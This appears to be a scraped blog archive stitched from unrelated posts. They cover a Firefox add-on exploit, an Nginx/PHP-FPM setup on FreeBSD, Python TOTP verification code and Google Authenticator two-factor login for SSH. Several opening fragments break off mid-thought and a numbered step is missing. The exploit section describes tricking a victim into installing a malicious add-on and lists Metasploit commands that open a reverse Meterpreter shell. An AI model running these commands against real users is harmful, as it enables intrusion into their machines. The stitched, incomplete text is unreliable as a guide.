http://eindbazen.net/2012/05/
I just tested this on a CentOS 6.2 box that had not been updated to the latest release, and the server is affected by this bug.
*nix, Networking, Security - A small part of everyday life
Off-the-Record (OTR) Messaging allows you to have private conversations over instant messaging by providing:
This exploit dynamically creates a .xpi add-on file. The resulting bootstrapped Firefox add-on is presented to the victim via a web page with. The victim's Firefox browser will pop a dialog asking if they trust the add-on. Once the user clicks "install", the add-on is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the add-on is marked to be "bootstrapped". As the add-on will execute the payload after each Firefox restart, an option can be given to automatically uninstall the add-on once the payload has been executed.
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit
getuid
sysinfo
http://www.exploit-db.com/exploits/18730/
Popular websites that run on Nginx are SourceForge, WordPress, and Hulu. By running Nginx on FreeBSD, you can deliver a light, efficient, powerful, stable and secure web server in a simple way.
What is PHP? I think you all already know, so there is no need to explain further. The PHP handler we will use is FastCGI Process Manager (FPM), an alternative PHP FastCGI implementation with some additional features useful for sites of any size, especially busier sites. This setup will surely deliver high-performance web service on low-spec hardware.
1. Let's start by installing the Nginx web server:
cd /usr/ports/www/nginx
make install clean
Once the installation starts, it will show the Nginx module selection page. You can select any Nginx module you want, but I will select the following modules to be compiled right away:
[X] HTTP_MODULE Enable HTTP module
[X] HTTP_ADDITION_MODULE Enable http_addition module
[X] HTTP_CACHE_MODULE Enable http_cache module
[X] HTTP_DAV_MODULE Enable http_webdav module
[X] HTTP_FLV_MODULE Enable http_flv module
[X] HTTP_GEOIP_MODULE Enable http_geoip module
[X] HTTP_GZIP_STATIC_MODULE Enable http_gzip_static module
[X] HTTP_IMAGE_FILTER_MODULE Enable http_image_filter module
[X] HTTP_PERL_MODULE Enable http_perl module
[X] HTTP_RANDOM_INDEX_MODULE Enable http_random_index module
[X] HTTP_REALIP_MODULE Enable http_realip module
[X] HTTP_REWRITE_MODULE Enable http_rewrite module
[X] HTTP_SECURE_LINK_MODULE Enable http_secure_link module
[X] HTTP_SSL_MODULE Enable http_ssl module
[X] HTTP_STATUS_MODULE Enable http_stub_status module
[X] HTTP_SUB_MODULE Enable http_sub module
[X] HTTP_XSLT_MODULE Enable http_xslt module
2. Web server installation is done. Make sure Nginx is enabled by adding the following line to /etc/rc.conf:
nginx_enable="YES"
3. Before we configure and start the web server, we need to install PCRE, libtool, PHP with FPM and PHP extensions. Follow these steps:
cd /usr/ports/devel/pcre
make install clean
cd /usr/ports/devel/libtool
make install clean
cd /usr/ports/lang/php5
make install clean
On the module selection page, select FPM (FastCGI Process Manager).
cd /usr/ports/lang/php5-extensions
make install clean
4. Since PHP-FPM is a service, we need to add this in /etc/rc.conf:
php_fpm_enable="YES"
5. By default, there is no php.ini specified. So we need to copy the php.ini which has been prepared during port installation.
cp /usr/local/etc/php/php.ini-production /usr/local/etc/php/php.ini
6. Start the PHP-FPM service:
/usr/local/etc/rc.d/php-fpm start
7. PHP-FPM is now listening on localhost port 9000. You can check this using the netstat command. Let's create the web and logs directories used to host the website (ignore this if you already have them):
mkdir /home/mydomain/public_html
mkdir /home/mydomain/logs
9. After that, we are good to go. But before starting Nginx, it is a good idea to check the configuration first:
nginx -t
/usr/local/etc/rc.d/nginx start
10. Now Nginx and PHP-FPM should be running correctly. If you make any changes to php.ini or the PHP extension files, you can restart PHP-FPM and reload Nginx:
/usr/local/etc/rc.d/php-fpm restart
/usr/local/etc/rc.d/nginx reload
To give the user the key, you’ll need to generate a cryptographically-secure 10 byte random key, presented to the user as a base32 16-character string. They can either enter this string directly, or you can use Google charts to provide a barcode that they can scan into the Google Authenticator application:
def get_barcode_image(username, domain, secretkey):
    # Build a Google Chart URL that renders the otpauth:// URI as a QR code
    url = "https://www.google.com/chart"
    url += "?chs=200x200&chld=M|0&cht=qr&chl=otpauth://totp/"
    url += username + "@" + domain + "%3Fsecret%3D" + secretkey
    return url
For an example of what a code looks like, click here, or, look below:

After the user has a secret key from you and has entered it into Google Authenticator either by typing it in directly or scanning in the barcode, you have to be able to verify the key during login (for example). The code to authenticate is only a few lines in Python:
import time
import struct
import hmac
import hashlib
import base64

def authenticate(secretkey, code_attempt):
    tm = int(time.time() / 30)
    secretkey = base64.b32decode(secretkey)
    # try 30 seconds behind and ahead as well
    for ix in [-1, 0, 1]:
        # convert timestamp to raw bytes
        b = struct.pack(">q", tm + ix)
        # generate HMAC-SHA1 from timestamp based on secret key
        hm = hmac.new(secretkey, b, hashlib.sha1).digest()
        # extract 4 bytes from digest based on LSB
        # (indexing bytes yields an int on Python 3, so no ord() is needed)
        offset = hm[-1] & 0x0F
        truncatedHash = hm[offset:offset+4]
        # get the code from it
        code = struct.unpack(">L", truncatedHash)[0]
        code &= 0x7FFFFFFF
        code %= 1000000
        # constant-time comparison of the expected and supplied codes
        expected = ("%06d" % code).encode()
        if hmac.compare_digest(expected, str(code_attempt).encode()):
            return True
    return False
Source :
http://www.brool.com/index.php/using-google-authenticator-for-your-website
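As an added illustration (not code from the original post): generating the 10-byte secret described above, building the otpauth:// URI so the QR code can be rendered locally, and verifying codes while refusing a time step that was already accepted. The names new_secret, provisioning_uri, totp and ReplaySafeVerifier are assumptions of this example, and the demo secret is the RFC 6238 test key, not a real credential.

```python
import base64, hashlib, hmac, secrets, struct, time
from urllib.parse import quote

def new_secret():
    """10 bytes from the OS CSPRNG, presented as a 16-character base32 string."""
    return base64.b32encode(secrets.token_bytes(10)).decode("ascii")

def provisioning_uri(username, domain, secretkey):
    """otpauth:// URI for the authenticator app; the label is URL-encoded."""
    label = quote(f"{username}@{domain}", safe="@")
    return f"otpauth://totp/{label}?secret={secretkey}"

def totp(secretkey, counter):
    """6-digit code for one 30-second counter (HMAC-SHA1, dynamic truncation)."""
    key = base64.b32decode(secretkey)
    hm = hmac.new(key, struct.pack(">q", counter), hashlib.sha1).digest()
    offset = hm[-1] & 0x0F
    code = struct.unpack(">L", hm[offset:offset + 4])[0] & 0x7FFFFFFF
    return "%06d" % (code % 1000000)

class ReplaySafeVerifier:
    """Hypothetical per-user state: the last 30-second counter that was accepted."""
    def __init__(self, secretkey):
        self.secretkey = secretkey
        self.last_counter = -1

    def verify(self, code_attempt, now=None):
        tm = int((time.time() if now is None else now) // 30)
        attempt = str(code_attempt).encode()
        accepted = False
        # same -1/0/+1 window as the page's authenticate(); no early exit,
        # so every candidate is compared in constant time
        for counter in (tm - 1, tm, tm + 1):
            match = hmac.compare_digest(totp(self.secretkey, counter).encode(), attempt)
            # a code only counts if its time step is newer than the last accepted one
            if match and counter > self.last_counter:
                self.last_counter = counter
                accepted = True
        return accepted

if __name__ == "__main__":
    rfc_key = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"  # RFC 6238 test key, base32
    v = ReplaySafeVerifier(rfc_key)
    print(v.verify("287082", now=59), v.verify("287082", now=59))
    print(provisioning_uri("alice", "example.com", new_secret()))
```

In a real deployment last_counter has to be stored per user alongside the secret, so that a restart does not reopen the replay window.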
In case you’re not familiar with the term, this form of authentication requires something you have (in this case your mobile phone) and something you know (your password).
You’ll need either an iPhone, an Android enabled device or a Blackberry.

Before starting, go download and install the Google Authenticator to your phone.
First you need to install three prerequisites: gcc, mercurial and libpam0g-dev (make sure you either execute these steps as root or use sudo):
$ apt-get update
$ apt-get -yy install gcc mercurial libpam0g-dev
Now let’s clone the repo and install it:
$ cd ~
$ hg clone https://google-authenticator.googlecode.com/hg/ \
    google-authenticator
$ cd google-authenticator/libpam
$ make install
You should see something like this:
... some gcc compilation output ...
cp pam_google_authenticator.so /lib/security
cp google-authenticator /usr/local/bin
sudo chmod 755 /lib/security/pam_google_authenticator.so \
    /usr/local/bin/google-authenticator
First, edit /etc/ssh/sshd_config and change the ChallengeResponseAuthentication from no to yes, here:
# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no
It should now be:
# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication yes
Now, change the PAM configuration to include the Google Authenticator module. Edit /etc/pam.d/common-auth and insert a new line between the comment and the first auth line:
# here are the per-package modules (the "Primary" block)
auth [success=1 default=ignore] pam_unix.so nullok_secure
# here's the fallback if no module succeeds
Leaving it this way:
# here are the per-package modules (the "Primary" block)
auth required pam_google_authenticator.so
auth [success=1 default=ignore] pam_unix.so nullok_secure
# here's the fallback if no module succeeds
Create a configuration for the current shell user:
$ google-authenticator
https://www.google.com/chart?chs=200x200&chld=M|0&cht=qr&chl=otpauth://totp/root@ some#some%3Fsecret%3DPKRTA4H5GLN7OTLA
Your new secret key is: PKRTA4H5GLN7OTLA
Your verification code is 613177
Your emergency scratch codes are:
  80419043
  52322813
  46557473
  35541313
  66835603

Do you want me to update your "~/.google_authenticator" file (y/n) y

Do you want to disallow multiple uses of the same authentication
token? This restricts you to one login about every 30s, but it increases
your chances to notice or even prevent man-in-the-middle attacks (y/n) y
Now, copy and paste the generated URL to your browser and a QRCode will be generated:

Open the Google Authenticator app on your phone, choose Scan Barcode and point the camera to your browser. A new key should be added automatically to your list. This code will change every 30 seconds. Please note that if you don’t have a barcode scanner you will be prompted to install one.
If you’re still unsure how to use your phone’s app, please check these step by step instructions on Google Accounts help.
Also, save the scratch codes, they can be used when you don’t have your phone available.
You can repeat these steps for each user you want to add two factor authentication for.
Now save and exit your editor and restart the ssh daemon. IMPORTANT: do not close this ssh session after restarting the ssh service.
$ /etc/init.d/ssh restart
 * Restarting OpenBSD Secure Shell server sshd [ OK ]
Now open another ssh session and try to log in. You should now be prompted for the Verification code and your Password. Enter the code as it appears on your phone, and your usual password for the user:
$ ssh root@100.200.100.200
Verification code:
Password:
Linux ahost 2.6.32-24-generic-pae #39-Ubuntu SMP Wed Jul 28 07:39:26 UTC 2010 i686

Ubuntu 10.04.1 LTS

Welcome to Ubuntu!
 * Documentation: https://help.ubuntu.com/

 System information as of Sat Feb 19 01:06:03 EST 2011

 System load: 0.0 Processes: 105
 Usage of /: 30.6% of 4.85GB Users logged in: 1
 Memory usage: 44% IP address for eth0: 100.200.100.200
 Swap usage: 3%

 Graph this data and manage this system at https://landscape.canonical.com/

root@ahost:~#
If by any chance the authentication failed after a couple of tries, it’s recommended that you undo the changes you’ve made to /etc/ssh/sshd_config and to /etc/pam.d/common-auth, and restart the ssh daemon one more time. The authentication method should revert to password-only (or publickey, depending on what you had before).